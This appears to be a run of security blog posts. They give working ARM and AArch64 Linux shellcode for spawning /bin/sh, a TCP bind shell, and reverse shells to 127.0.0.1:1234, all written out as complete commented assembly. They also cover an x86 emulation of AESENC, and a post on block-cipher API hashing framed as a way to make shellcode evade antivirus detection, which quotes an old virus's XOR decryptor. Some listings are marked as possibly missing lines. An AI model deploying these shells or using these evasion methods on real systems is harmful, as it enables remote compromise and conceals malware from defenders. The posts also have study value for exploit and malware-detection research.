I’ve no idea how useful these will be since they were only tested on Linux Ubuntu. They were more or less derived from 32-bit codes shown here, except there’s no attempt at all to eliminate null bytes, and there are obviously different registers being used.

CPU parameters system call
32 r0-r6 r7
64 x0-x7 x8
  • Registers r0-r6 on AArch32 are used for system call parameters while registers x0-x7 on AArch64 are used.
  • Register r7 on AArch32 is used for the system call number while x8 is used on AArch64
  • Accessing the program counter (PC) directly on AArch64 is no longer possible, although relative instructions like ADR and LDR are, so perhaps there’s no need to.
  • You can no longer push/pop multiple registers, which reminds me of when AMD64 decided to abandon PUSHAD/POPAD.

Depending on your needs, these may require further modifications. They all contain null bytes, so would require encoding or a complete rewrite to remove them. The following is the connect shell for example which contains many null bytes.

Execute /bin/sh

// 28 bytes
// (five 4-byte instructions followed by the 8-byte "/bin/sh\0" string)
// NOTE(review): the `_start:` and `sh:` label lines are not visible in this
// listing - confirm against the original source.
    .global _start

    // execve("/bin/sh", NULL, NULL);
    adr    x0, sh         // x0 = "/bin/sh"
    eor    x1, x1, x1     // x1 = NULL
    eor    x2, x2, x2     // x2 = NULL
    mov    x8, #221       // x8 = execve
    svc    0
    .ascii "/bin/sh\0"

Bind /bin/sh to TCP port

// 136 bytes
// AArch64 Linux bind shell: listens on TCP port 1234 (INADDR_ANY), then
// redirects stdin/stdout/stderr to the accepted connection and runs /bin/sh.
// Register use: x6 = socket descriptor (listening socket, then accepted one).
    .global _start

_start:
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    eor    x2, x2, x2   // x2 = IPPROTO_IP
    mov    x1, #1       // x1 = SOCK_STREAM
    mov    x0, #2       // x0 = AF_INET
    mov    x8, #198     // x8 = socket
    svc    0
    mov    x6, x0       // x6 = s
    // bind(s, &sa, sizeof(sa));  
    // x0 still holds s: nothing has written x0 since socket() returned
    mov    x2, #16      // x2 = sizeof(sa)
    adr    x1, sin_port // x1 = &sa
    mov    x8, #200     // x8 = bind
    svc    0
    // listen(s, 0);
    eor    x1, x1, x1   // x1 = 0    
    mov    x0, x6       // x0 = s
    mov    x8, #201     // x8 = listen 
    svc    0    
    // r = accept(s, 0, 0);
    eor    x1, x1, x1
    eor    x2, x2, x2
    mov    x0, x6        // x0 = s
    mov    x8, #202      // x8 = accept    
    svc    0    
    mov    x6, x0        // x6 = r
    // AArch64 has no dup2; syscall 24 is dup3(oldfd, newfd, flags).
    // x2 (flags) is still 0 from the accept() setup above.
    // dup3(r, FILENO_STDERR, 0);
    // dup3(r, FILENO_STDOUT, 0);
    // dup3(r, FILENO_STDIN,  0);
    mov    x1, #2        // for 3 descriptors (2, 1, 0)
dup_loop:
    mov    x0, x6        // x0 = r (reloaded each pass: svc overwrites x0)
    mov    x8, #24       // x8 = dup3 
    svc    0
    subs   x1, x1, #1    // subtract one
    bpl    dup_loop      // loop while x1 >= 0

    // execve("/bin/sh", NULL, NULL);    
    // x2 is still 0 here, so only x1 (left at -1 by the loop) needs clearing
    eor    x1, x1, x1
    adr    x0, sh        // x0 = "/bin/sh" 
    mov    x8, #221      // x8 = execve
    svc    0
sin_port:                // start of struct sockaddr_in (sin_family, sin_port, sin_addr)
    .word  0xd2040002    // 1234, AF_INET
    .word  0x00000000    // INADDR_ANY
sh:
    .ascii "/bin/sh\0"

Reverse connect to port and spawn /bin/sh

// 104 bytes
// AArch64 Linux reverse shell: connects to 127.0.0.1:1234, redirects
// stdin/stdout/stderr to the socket and runs /bin/sh.
// Register use: x6 = connected socket descriptor.
    .global _start

_start:
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    eor    x2, x2, x2  // x2 = IPPROTO_IP
    mov    x1, #1      // x1 = SOCK_STREAM
    mov    x0, #2      // x0 = AF_INET
    mov    x8, #198    // x8 = socket 
    svc    0
    // connect(s, &sa, sizeof(sa));
    // x0 still holds s from socket()
    mov    x6, x0       // x6 = s
    adr    x1, sin_port // x1 = &sa
    mov    x2, #16      // x2 = sizeof(sa)
    mov    x8, #203     // x8 = connect
    svc    0
    // AArch64 has no dup2; syscall 24 is dup3(oldfd, newfd, flags).
    // dup3(s, FILENO_STDERR, 0);
    // dup3(s, FILENO_STDOUT, 0);
    // dup3(s, FILENO_STDIN,  0);
    mov    x1, #2        // for 3 descriptors (2, 1, 0)
    eor    x2, x2, x2    // x2 = 0 (dup3 flags)
dup_loop:
    mov    x0, x6        // x0 = s (reloaded each pass: svc overwrites x0)
    mov    x8, #24       // x8 = dup3 
    svc    0
    subs   x1, x1, #1    // subtract 1
    bpl    dup_loop      // loop while x1 >= 0

    // execve("/bin/sh", NULL, NULL);
    adr    x0, sh        // x0 = "/bin/sh" 
    eor    x2, x2, x2    // x2 = NULL
    eor    x1, x1, x1    // x1 = NULL  
    mov    x8, #221      // x8 = execve
    svc    0
sin_port:                // start of struct sockaddr_in (sin_family, sin_port, sin_addr)
    .word  0xd2040002    // 1234, AF_INET
    .word  0x0100007f    // 127.0.0.1
sh:
    .ascii "/bin/sh\0"

View sources here

Posted in arm, assembly, security, shellcode | Tagged , , , | Leave a comment

Shellcode: Linux ARM Thumb mode


Just a quick post about some shellcodes for a raspberry pi 3 I purchased recently to learn ARM assembly.

For those interested in developing your own, you can find a full list of Linux system calls in Thumb mode here

These examples are only intended for 32-bit Linux. BSD or other OS that run on RPI3 will most likely use completely different system call numbers.

Some of you might find these 32-bit codes with comments useful as a reference if nothing else. I’ll discuss 64-bit codes in a later post.


If you want to assemble these codes on raspberry pi, you can use the GNU Assembler which should already be installed.

I use runsc to test out the codes.

Thumb mode

Raspbian by default runs in ARM mode, but the architecture has support for several modes, one of which is Thumb. Thumb uses 16-bit opcodes which allows our final shellcodes to be more compact. You’ll see the following used for each code.

// 8 bytes
// ARM -> Thumb switch stub used at the start of each 32-bit shellcode.
    .global _start

    // switch to thumb mode
    .code 32
_start:
    add    r3, pc, #1     // r3 = address after bx, with bit 0 set to select Thumb state
    bx     r3
    .code 16              // everything assembled after this point is Thumb code

Execute /bin/sh

The Load Register (LDR) pseudo-instruction loads the two halves of the /bin//sh string into registers in 32-bit ARM mode before switching to Thumb mode.

// 36 bytes
// Linux ARM (32-bit): execve("/bin//sh", NULL, NULL).
// The string is loaded into r0/r1 in ARM mode, then built on the stack in Thumb mode.
    .arch armv6
    .global _start

    .code 32
_start:
    ldr    r0, =#0x6e69622f // /bin
    ldr    r1, =#0x68732f2f // //sh

    // switch to thumb mode
    add    r2, pc, #1     // bit 0 set selects Thumb state on bx
    bx     r2
    .code 16
    // execve("/bin//sh", NULL, NULL);
    eor    r2, r2, r2     // r2 = NULL    
    push   {r0, r1, r2}   // save string + null bytes
    mov    r0, sp         // r0 = "/bin//sh", 0
    eor    r1, r1, r1     // r1 = NULL
    mov    r7, #11        // r7 = execve
    svc    1

Bind Shell

// 104 bytes
// Linux ARM (32-bit EABI) bind shell: listens on TCP port 1234 (INADDR_ANY),
// then redirects stdin/stdout/stderr to the accepted connection and runs /bin//sh.
// Register use: r4 = sin_family/sin_port word, r5:r6 = "/bin//sh", r8 = socket.
    .arch armv6
    .global _start

    .code 32
_start:
    // In memory (little-endian) this word is 02 FF 04 D2:
    //   sin_family = 02 FF (the FF is cleared at run time -> AF_INET)
    //   sin_port   = 04 D2 (0x04D2 = 1234 in network byte order)
    // The previous value 0xD402FF02 stored 02 D4, i.e. port 724.
    ldr    r4, =#0xD204FF02 // htons(1234), AF_INET
    ldr    r5, =#0x6e69622f // /bin
    ldr    r6, =#0x68732f2f // //sh
    // switch to thumb mode
    add    r3, pc, #1
    bx     r3 
    .code 16
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    eor    r2, r2, r2   // r2 = IPPROTO_IP
    mov    r1, #1       // r1 = SOCK_STREAM
    lsl    r7, r1, #8   // r7 = 1*256
    add    r7, #25      // r7 = 281 = socket 
    mov    r0, #2       // r0 = AF_INET
    svc    1
    mov    r8, r0       // r8 = s
    // bind(s, &sa, sizeof(sa)); 
    // r0 still holds s from socket()
    mov    r1, r4 
    push   {r1, r2}     // save sa on stack (r2 = 0 = INADDR_ANY)
    mov    r1, sp       // r1 = &sa
    strb   r2, [r1, #1] // null the 0xFF in sa.sin_family
    mov    r2, #16      // sizeof(sa) 
    add    r7, #1       // r7 = 281+1 = 282 = bind
    svc    1
    // listen(s, 1);
    mov    r1, #1       // r1 = 1    
    mov    r0, r8       // r0 = s
    add    r7, #2       // r7 = 282+2 = 284 = listen 
    svc    1    
    // r = accept(s, 0, 0);
    eor    r2, r2, r2   // r2 = 0
    eor    r1, r1, r1   // r1 = 0
    mov    r0, r8       // r0 = s
    add    r7, #1       // r7 = 284+1 = 285 = accept    
    svc    1    
    mov    r8, r0       // r8 = r
    // dup2(r, FILENO_STDERR);
    // dup2(r, FILENO_STDOUT);
    // dup2(r, FILENO_STDIN);
    mov    r1, #3       // for 3 descriptors
    mov    r7, #63      // r7 = dup2 
c_dup:
    mov    r0, r8       // r0 = r (reloaded each pass: svc overwrites r0)
    sub    r1, #1       // sets the flags tested by bne below
    svc    1
    bne    c_dup        // while (r1 != 0)

    // execve("/bin//sh", NULL, NULL);
    // r1 = 0 after the loop and r2 = 0 since accept()
    mov    r7, r2 
    push   {r5, r6, r7}    
    mov    r0, sp       // r0 = "/bin//sh" 
    mov    r7, #11      // r7 = execve
    svc    1

Reverse Connect

Default sockaddr_in values are: 127.0.0.1, 1234, AF_INET

// 92 bytes
// Linux ARM (32-bit EABI) reverse shell: connects to 127.0.0.1:1234,
// redirects stdin/stdout/stderr to the socket and runs /bin//sh.
// Register use: r3:r4 = sockaddr_in words, r5:r6 = "/bin//sh", r8 = socket.
    .arch armv6
    .global _start


    .code 32
_start:
    // In memory (little-endian) this word is 02 FF 04 D2:
    //   sin_family = 02 FF (the FF is cleared at run time -> AF_INET)
    //   sin_port   = 04 D2 (0x04D2 = 1234 in network byte order)
    // The previous value 0xD402FF02 stored 02 D4, i.e. port 724.
    ldr    r3, =#0xD204FF02 // htons(1234), AF_INET
    ldr    r4, =#0x0100007f // 127.0.0.1
    ldr    r5, =#0x6e69622f // /bin
    ldr    r6, =#0x68732f2f // //sh

    // switch to thumb mode    
    add    r0, pc, #1
    bx     r0 
    .code 16
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    eor    r2, r2, r2  // r2 = IPPROTO_IP
    mov    r1, #1      // r1 = SOCK_STREAM
    mov    r0, #2      // r0 = AF_INET
    lsl    r7, r1, #8  // multiply by 256
    add    r7, #25     // 256+25 = socket
    svc    1

    mov    r8, r0       // r8 = s
    // connect(s, &sa, sizeof(sa));
    // r0 still holds s from socket()
    push   {r3, r4}     // save sa on stack
    mov    r1, sp       // r1 = &sa
    strb   r2, [r1, #1] // null the 0xFF in sa.sin_family
    mov    r2, #16      // r2 = sizeof(sa)
    add    r7, #2       // r7 = 281+2 = connect
    svc    1
    // dup2(s, FILENO_STDERR);
    // dup2(s, FILENO_STDOUT);
    // dup2(s, FILENO_STDIN);
    mov    r1, #3      // for 3 descriptors
    mov    r7, #63     // r7 = dup2 
c_dup:
    mov    r0, r8      // r0 = s (reloaded each pass: svc overwrites r0)
    sub    r1, #1      // decrease r1 (sets the flags tested by bne below)
    svc    1
    bne    c_dup       // while (r1 != 0)

    // execve("/bin//sh", NULL, NULL);
    // r1 = 0 after the loop
    eor    r2, r2, r2 
    mov    r7, r2
    push   {r5, r6, r7}
    mov    r0, sp  
    mov    r7, #11       // r7 = execve
    svc    1
    nop                  // alignment by 4 bytes
    nop                  // alignment by 4 bytes

view sources here

Posted in arm, assembly, pi, raspberry, security, shellcode | Tagged , , , , , | 1 Comment

Emulation of AESENC and AESENCLAST instructions in x86 assembly


aesenc and aesenclast are AES-NI instructions implemented on the x86 architecture.

Recently, a well known cryptographer J.P Aumasson published code to emulate these instructions in C, which would be very useful for emulators, and virtual machines in general.

The combination of ShiftRows and SubBytes in one line inspired me to write an implementation in x86 assembly.

The following code is not optimized for speed nor does it counter against electromagnetic attacks.

Galois Multiplication

Used for the mix columns and substitution layers. Based on algorithm by Andreas Hoheisel.

// Multiply each of the four bytes packed in w by 2 in GF(2^8),
// reducing with the AES polynomial (0x1B) whenever a byte's top bit is set.
uint32_t gf_mul2 (uint32_t w) {
    // t holds the top bit of every byte; those bytes need reduction
    uint32_t t = w & 0x80808080;
    // clear the top bits before shifting so no byte carries into its neighbour,
    // then XOR 0x1B into each byte that overflowed
    return ( (w ^ t ) << 1) ^ ( ( t >> 7) * 0x0000001B);
}

The assembly …

Sub Bytes

Derived from code here

// Compute the AES S-box value of x without a lookup table:
// multiplicative inverse in GF(2^8) via discrete log/antilog with generator 3,
// followed by the affine transformation.
// Not constant time: the loop counts depend on x.
uint8_t sub_byte (uint8_t x)
{
    uint8_t i, y=x, sb;

    // zero has no inverse; y stays 0 and only the affine step is applied
    if (x) {
      // calculate logarithm gen 3
      // (y ^= gf_mul2(y) multiplies y by 3; stop when 3^i == x)
      for (i=1, y=1; i != 0; i++) {
        y ^= gf_mul2(y);
        if (y == x) break;
      }
      // 8-bit ~i equals 255 - i, the logarithm of the inverse
      x = ~i;
      // calculate anti-logarithm gen 3
      for (i=0, y=1; i<x; i++) {
        y ^= gf_mul2(y);
      }
    }
    // affine transformation: XOR y with its four left rotations, then 0x63
    sb = y;
    for (i=0; i<4; i++) {
      y   = ROTL8(y, 1);
      sb ^= y;
    }
    return sb ^ 0x63;
}

The assembly code, but bear in mind, it has no countermeasures to side channel attacks.

; *****************************   
; uint8_t sub_byte (uint8_t x)
; *****************************       
; In:  al = x
; Out: al = S-box(x); every other register is preserved by PUSHAD/POPAD.
; Register use: dl = x, then y for the anti-log loop; bl = y / i; bh = i / ~i.
; NOTE(review): LOOP counts with the full ECX, so this assumes the upper
; 24 bits of ECX are zero on entry -- confirm against callers.
; No countermeasures against side-channel attacks.
sub_byte:
    pushad
    test   al, al            ; if (x)
    xchg   eax, edx          ; y = x    (xchg leaves the flags from test intact)
    jz     sb_l2
    ; calculate logarithm gen 3
    mov    bh, 1             ; i = 1
    mov    bl, 1             ; y = 1
sb_l0:
    mov    al, bl            ; y ^= gf_mul2(y)
    call   gf_mul2
    xor    bl, al       
    cmp    bl, dl            ; if (y == x) break;
    jz     sb_lx
    inc    bh                ; i++
    jnz    sb_l0             ; i != 0
sb_lx:
    ; calculate anti-logarithm gen 3
    xor    bl, bl            ; i = 0
    mov    dl, 1             ; y = 1
    xor    bh, -1            ; x = ~i (bitwise NOT doesn't affect ZF)
    jz     sb_l2    
sb_l1:
    mov    al, dl            ; al = y
    call   gf_mul2
    xor    dl, al            ; y ^= gf_mul2(y)
    inc    bl                ; i++
    cmp    bl, bh            ; i < x 
    jnz    sb_l1             ; 
sb_l2:
    mov    al, dl            ; if before sb_l0, dl is already zero
    mov    cl, 4             ; loop 4 times
sb_l3:
    rol    dl, 1             ; y = ROTL8(y, 1);
    xor    al, dl            ; sb ^= y;
    loop   sb_l3 
    xor    al, 0x63          ; sb ^= 0x63
    mov    [esp+1ch], al     ; store into the saved EAX slot so popad returns it in al
    popad
    ret


These 2 are combined by using a parameter last
Simply set last to zero or one.

void aesenc (void *state, void *key, int last) {
    w128_t  *s, *k, v;
    uint32_t i, w;

    // sub bytes and shift rows
    for (i=0; i<16; i++) {    
      v.b[((((i >> 2) + 4 - (i & 3) ) & 3) * 4) + (i & 3)] = sub_byte(s->b[i]);
    // if not last round
    if (!last) {
      // mix columns
      for (i=0; i<4; i++) {
        w = v.w[i];
        v.w[i] = ROTR32(w,  8) ^ 
                 ROTR32(w, 16) ^ 
                 ROTL32(w,  8) ^ 
                 XT(ROTR32(w, 8) ^ w);
    // add round key
    for (i=0; i<4; i++) {
      s->w[i] = v.w[i] ^ k->w[i];

The x86 assembly code..

; **********************************   
; uint8_t aesenc (void *s, void *rk)
; **********************************       
; Emulates AESENC/AESENCLAST: SubBytes+ShiftRows, optional MixColumns,
; then AddRoundKey over the 16-byte state.
; NOTE(review): this listing looks incomplete. The jump targets
; subbytes_shiftrows and mix_columns are referenced but never defined here,
; and there is no entry label or return. Lines holding only a label or a
; single mnemonic appear to have been lost -- restore from the original
; source before assembling.
; NOTE(review): the code reads a third value ("last") with lodsd, so the
; prototype above is presumably missing an "int last" parameter -- confirm.
    xor    ecx, ecx          ; i = 0     
    lea    esi, [esp+32+4]   ; presumably the first stack argument, past a pushad frame + return address -- TODO confirm
    push   eax               ; save state
    xchg   eax, ebx          ; ebx = round key 
    lodsd                    ; eax = last
    pop    esi               ; esi = state   
    pushad                   ; v = alloc(32)
    mov    edi, esp          ; edi = v
    dec    eax               ; last--
    ; --- SubBytes + ShiftRows: v.b[shifted index] = sub_byte(s[i]) ---
    mov    al, [esi+ecx]     ; al = sub_byte(s[i])
    call   sub_byte
    mov    edx, ecx          ; edx = i
    mov    ebp, ecx          ; ebp = i
    shr    ebp, 2            ; ebp >>= 2
    and    edx, 3            ; edx &= 3
    sub    ebp, edx          ; ebp -= edx
    and    ebp, 3            ; ebp &= 3
    lea    edx, [edx+ebp*4]  ; edx = (edx + ebp * 4) 
    mov    [edi+edx], al     ; v.b[edx] = al
    inc    ecx               ; i++
    cmp    cl, 16            ; for (i=0; i<16; i++)
    jnz    subbytes_shiftrows
    ; NOTE(review): as listed, ZF is always set here by the cmp above, so this
    ; jz is always taken. Presumably the flags from "dec eax" were saved and
    ; restored by lines that are missing -- confirm.
    jz     add_round_key    
    ; --- MixColumns over the four 32-bit columns of v ---
    ; NOTE(review): this loop overwrites ebx, esi and edi, which
    ; add_round_key below uses as pointers; presumably a register
    ; save/restore around the loop is missing -- confirm.
    mov    cl, 4    
    mov    ebx, [edi]        ; w0 = v.w[i]
    mov    eax, ebx          ; w1 = ROTR32(w0, 8)
    ror    eax, 8
    mov    esi, eax          ; w2 = ROTR32(w0, 8)
    xor    eax, ebx          ; w1 ^= w0 
    call   gf_mul2
    xor    esi, eax          ; w2 ^= gf_mul2(w1)
    ror    ebx, 16           ; w0 = ROTR32(w0, 16)
    xor    esi, ebx          ; w2 ^= w0
    ror    ebx, 8            ; w0 = ROTR32(w0, 8)
    xor    ebx, esi          ; w0 ^= w2
    xchg   ebx, eax          ; eax = w0
    stosd                    ; v.w[i] = eax
    loop   mix_columns
    ; --- AddRoundKey: s[i] = v.b[i] ^ rk[i]; ecx is the byte counter ---
add_round_key:               ; for (i=0; i<16; i++) {
    mov    al, [edi]         ;   al = v.b[i] 
    xor    al, [ebx]         ;   al ^= rk[i]
    inc    ebx               ;   
    mov    [esi], al         ;   s[i] = al
    cmpsb                    ;   used only to advance esi and edi by one
    loop   add_round_key     ; }
    popad                    ; release memory
    popad                    ; restore registers

The size of assembly code is 195 bytes. Approximately 300 for C generated assembly.

See original code by Aumasson here

Posted in assembly, cryptography, encryption, security | Tagged , , , , , , , | Leave a comment

Shellcode: Windows API hashing with block ciphers ( Maru Hash )


String/Pattern Matching Algorithms are by far the most popular and easy way to detect a shellcode. The principle is simple: all codes have unique characteristics which can be used as signatures to identify in memory.

Even shellcodes with no prior analysis can contain some known value, or piece of code which at least makes it appear suspicious, and worthy of closer inspection.

The known values I’m referring to are of course API strings and hashes which have always been useful in detecting malicious code for 20+ years.

If we’re going to develop more advanced shellcodes that go undetected by modern AV solutions, we need to consider using a HLL like C or C++ along with unconventional programming that guarantees everything in a shellcode is permutable.

It’s not just the executable code that should be permutable, but the entire thing; code, data, constants, strings..everything.

What I show here today is how to create permutable API hashes using a hash function called Maru (Ma-roo), named after the Japanese cat.

Maru uses a block cipher to generate a hash of string. You don’t have to use a block cipher for this, but a cryptographic primitive can help protect the hashes against collision attacks found using Satisfiability Modulo Theories (SMT).

For more information, read Using SAT and SMT to defeat simple hashing algorithms

Also, read the section on cryptography in Quick introduction into SAT/SMT solvers and symbolic execution


**WARNING: Maru is not a cryptographic hash, and should not be used for applications where a secure hash algorithm is required.**

Signature detection

When viruses for MS-DOS started to appear 30 years ago, detection by signature was relatively simple.

In an attempt to hide code, authors used a simple XOR operation with an 8-bit value. For example, the ‘Skism Rythem Stack Virus-808‘ from 1991 used milliseconds of the current time to “encrypt” each new infection, so it would appear differently for 100 versions.

This is the entry point of that code, and its “decryption” process.

; Entry point and XOR "decryption" stub of the 1991 virus sample, quoted for analysis.
; 16-bit DOS code, TASM/MASM syntax.
jmp    virus_start

encrypt_val db 00h         ; 8-bit XOR key, rewritten on each infection

virus_start:
    call   encrypt         ; encrypt/decrypt file
    jmp    virus           ; go to start of code

; XOR every byte of the virus body with encrypt_val.
; The same routine encrypts and decrypts because XOR is its own inverse.
encrypt:
    push   cx
    mov    bx, offset virus_code ; start encryption at data

xor_loop:
    mov    ch, [bx]        ; read current byte
    xor    ch, encrypt_val ; get encryption key
    mov    [bx], ch        ; switch bytes
    inc    bx              ; move bx up a byte
    cmp    bx,  offset virus_code + virus_size
    ; are we done with the encryption
    jle    xor_loop        ; no? keep going
    pop    cx
    ret

Later in the code, the virus will update ‘encrypt_val’ using the milliseconds value of the current time.

    mov    ah, 2ch         ; DOS function 2Ch: get system time
    int    21h             ; returns DL = hundredths of a second (0-99)

    mov    encrypt_val, dl ; save the hundredths value as the new XOR key,
                           ; so there are 100 possible mutations
                           ; theres 100 mutations possible

There’s some effort to hide the body of the virus here, but the decrypter is still visible and easily detected. Moreover, a scanner can emulate the decrypter routine, exposing the body of virus in memory before performing detection by signature.

When Win32 viruses started to appear in 1997, there were no longer MS-DOS interrupts. Instead there were API functions, accessible through dynamic libraries or DLL, and this made detecting malware even easier. Any code with a large block of API strings in it, was immediately going to raise alarm bells.

Authors eventually started to use 32-bit checksums, the most popular of which was CRC32. Later, LSD-PL inspired a trend of using some basic Add-Rotate-Xor routine, like the following that appeared in their WASM package.

; Walk the export name table and compare an add-rotate hash of each symbol name
; against the wanted hash.
; In:  ebx = name pointer table, edx = image base, eax = symbol index, ecx = wanted hash
i3: mov   esi,[4*eax+ebx]    ; ptr to symbol name
    add   esi,edx            ; rva2va

    push  ebx      ; hash: h=((h<<5)|(h>>27))+c
    push  eax
    xor   ebx,ebx
i4: xor   eax,eax  ; hash loop
    lodsb          ; al = next character of the name (was missing: the hash was always 0)
    rol   ebx,5
    add   ebx,eax
    cmp   eax,0    ; stop at the terminating null
    jnz   i4 
    ror   ebx,5    ; undo the rotate applied for the terminator
    cmp   ebx,ecx  ; hash compare
    pop   eax      ; pop does not change flags, so je still sees the compare result
    pop   ebx
    je    i5       ; same: symbol found
    inc   eax
    jmp   i3       ; different: go to the next symbol

Most legitimate code doesn’t have to resolve an API by string or hash manually through Import Address Table (IAT) or Export Address Table (EAT) and if some code does behave this way, it’s usually up to no good.

What’s funny about API hashing; It was supposed to prevent signature detection of strings. So, instead of detecting by string, AV just detected the hash of an API string, which still makes it a perfectly valid signature.

Even the shellcodes generated by many popular payload tools (BeEF, Meterpreter, Veil) all use basic hashing algorithms with no entropy or randomization. They are consistently the same, thus are just as easy to detect as any API string itself.

Of course, these packages offer the ability to encrypt payloads with a stream or block cipher like RC4 or AES. Again though, even if it will pass a simple scan by AV or IDS, a more thorough analysis using an emulator can decrypt the main code and perform pattern matching afterwards, having no problem with detection.

Plain strings problem

Ideally, an attacker would want everything obfuscated/encrypted during compilation and decrypted at run-time without using additional tools or code.

constexpr is ideal for C++ code, but for C, there’s no such feature unless of course, a compiler can be modified to encrypt all strings at compile time?

Some assemblers such as MASM and NASM support macro based compilation, but are cumbersome to work with on complex functions. (not that you couldn’t)

Z0MBiE already discussed the problem of plain strings in Data Encoding In Meta Viruses and Solving Plain Strings Problem In HLL around 2002 which did somewhat “solve” the problem, but if you look closely at the sources, there’s insufficient entropy used.

At the time, he provided a library VirStr with TASM macros that worked with Borland’s C compiler, but these do not work with mingw, msvc or clang, and the library has never been updated since.

The purpose of using entropy for hashing of API strings is obviously to increase the difficulty of detecting a payload. It’s not enough to avoid detection forever, but it’s certainly better than existing hash algorithms with no entropy at all.

Hash function constructions

We can construct new hash algorithms from block ciphers, and these offer us the potential to use unique keys, thus generating completely different API hashes every time the key changes.

However, as you will see, very few block ciphers are suitable for lightweight applications such as shellcode.

Here are 3 potential constructions to use. (there are more, but only 3 are covered)

    • Davies–Meyer

H_i=E_{m_i}(H_{i-1})\oplus H_{i-1}

Feeds each block of the message (m_i) as the key to a block cipher. Feeds the previous hash value (H_{i-1}) as the plaintext to be encrypted.

The output ciphertext is then also XORed with the previous hash value (H_{i-1}) to produce the next hash value (H_i).

In the first round when there is no previous hash value it uses a constant pre-specified initial value (H_0).

    • Matyas–Meyer–Oseas

H_i=E_{g(H_{i-1})}(m_i)\oplus m_i

Feeds each block of the message (m_i) as the plaintext to be encrypted. The output ciphertext is then also XORed with the same message block (m_i) to produce the next hash value (H_i). The previous hash value (H_{i-1}) is fed as the key to the block cipher.

In the first round when there is no previous hash value it uses a constant pre-specified initial value (H_0).

    • Miyaguchi–Preneel

H_i = E_{g(H_{i-1})}(m_i)\oplus H_{i-1}\oplus m_i

Feeds each block of the message (m_i) as the plaintext to be encrypted. The output ciphertext is then XORed with the same message block (m_i) and then also XORed with the previous hash value (H_{i-1}) to produce the next hash value (H_i).

The previous hash value (H_{i-1}) is fed as the key to the block cipher.

In the first round when there is no previous hash value it uses a constant pre-specified initial value (H_0).

Choosing a block cipher

We know signature detections require some static value, and what better static values exist than cryptographic constants?

You can of course change them, but then it might affect security of the cipher. So, it’s better to choose a cipher that doesn’t use any constants, at all.

While looking at potential block ciphers, my top 3 were based on Add-Rotate-Xor (ARX) designs.

    • Speck

Designed by the NSA, and published in 2013. Wide range of key and block sizes for different architectures. Proven to be the smallest software based block cipher available for most architectures.

Parameters for x86: 64-bit block, 128-bit key. For x86-64: 128-bit block, 256-bit key. Both implemented in 64 and 86 bytes respectively.

Here’s the x86 code.

    • Chaskey-LTS

Designed and published in 2015. Uses an Even-Mansour design with permutation function of SipHash. 128-bit keys, 128-bit blocks. Can be implemented in approx. 90 bytes using x86 assembly.

    • XTEA

eXtended Tiny Encryption Algorithm. A Feistel cipher, published in 1997 after weaknesses found in TEA. 128-bit keys, and 64-bit block. Has a known constant, 0x9E3779B9 which makes it susceptible to signature based detection. Can be implemented in approx. 80 bytes.

Speck was just the better design for lightweight applications, and can’t be easily identified by signature. (at least not from any constants)


The padding used is similar to MD4. Instead of length in bits stored as 64-bit integer, only a 32-bit integer is used. Since it will never exceed 256-bits for Maru 1 or 512 bits for Maru 2, there didn’t seem any point using a 64-bit integer.

Speck Parameters

Version 1 is suitable for 32-bit architectures while version 2 is suitable for 64-bit.

Ver. Cipher Block Size Key Size
1 Speck 64 128
2 Speck 128 256

32-bit Architectures

The following is implementation of Speck for Ver. 1

uint64_t speck64_encrypt(const void *buf, const void *key)
    uint32_t x0, x1;
    uint32_t k0, k1, k2, k3;
    int      i, t;
    w64_t    r;

    w64_t    *x=(w64_t*)buf;
    w128_t   *k=(w128_t*)key;
    // load key
    k0 = k->w[0]; k1 = k->w[1];
    k2 = k->w[2]; k3 = k->w[3];

    // load data
    x0 = x->w[0]; x1 = x->w[1];

    for (i=0; i<27; i++) {
      // encrypt block
      x0 = (ROTR32(x0, 8) + x1) ^ k0;
      x1 =  ROTL32(x1, 3) ^ x0;
      // create next subkey
      k1 = (ROTR32(k1, 8) + k0) ^ i;
      k0 =  ROTL32(k0, 3) ^ k1;
      XCHG(k3, k2);
      XCHG(k3, k1);    
    // store result
    r.w[0] = x0; r.w[1] = x1;
    return r.q;    

64-bit architectures

The following is implementation for Ver.2

void speck128_encrypt(const void *in, const void *key, void *out)
    uint64_t x0, x1;
    uint64_t k0, k1, k2, k3;
    uint64_t i, t;

    w128_t   *x=(w128_t*)in;
    w128_t   *r=(w128_t*)out;
    w256_t   *k=(w256_t*)key;
    // load key
    k0 = k->q[0]; k1 = k->q[1];
    k2 = k->q[2]; k3 = k->q[3];

    // load data
    x0 = x->q[0]; x1 = x->q[1];

    for (i=0; i<34; i++) {
      // encrypt block
      x0 = (ROTR64(x0, 8) + x1) ^ k0;
      x1 =  ROTL64(x1, 3) ^ x0;
      // create next subkey
      k1 = (ROTR64(k1, 8) + k0) ^ i;
      k0 =  ROTL64(k0, 3) ^ k1;

      // rotate left 64-bits
      XCHG(k3, k2);
      XCHG(k3, k1);     
    // store result
    r->q[0] = x0; r->q[1] = x1;    

Maru Parameters

The numbers below (excluding Ver.) represent number of bits.

Ver. CPU Construction Padding Key Message Max. Input Output
1 32 Davies-Meyer Merkle-Damgard 64 128 256 64
2 64 Davies-Meyer Merkle-Damgard 128 256 512 128

There are 2 64-bit constants used to initialize H_0 which are not really of any significance.

I just wanted something “random” without using a random number generator. Here is how to generate them using SpeedCrunch.

The 2nd value shown is used to initialize H_0 in both versions. The n-bit seed is xor’d against these values to make the hash output different.

I’ve emphasized the importance of eliminating constants which are not really permutable, and can be used as signatures, so why use them here?

You don’t have to use them. I’m only using here for illustration, but you can generate your own values to initialize H_0 or just use zero instead.

Maru 1

The only real difference between the two would be cipher parameters and local capacity for keys. We use a 32-bit seed here to initialize H_0.

uint64_t maru (const char *key, uint32_t seed)
    w64_t     h;
    w128_t    m;
    uint32_t  len, idx, end;

    // initialize H with seed
    h.q = MARU_INIT_H ^ seed;
    for (idx=0, len=0, end=0; !end; ) {
      // end of string or max len?
      if (key[len]==0 || len==MARU_KEY_LEN) {
        // add end bit
        m.b[idx++] = 0x80;
        // zero remainder of M
        memset (&m.b[idx], 0, (MARU_BLK_LEN - idx));
        // have we space in M for len?
        if (idx >= MARU_BLK_LEN-4) {
          // no, update H with E
          h.q ^= E(&h, &m);
          // zero M
          memset (m.b, 0, MARU_BLK_LEN);
        // add total len in bits
        m.w[3] = (len * 8);
        idx = MARU_BLK_LEN;
      } else {    
        // add byte to M
        m.b[idx++] = (uint8_t)key[len++];
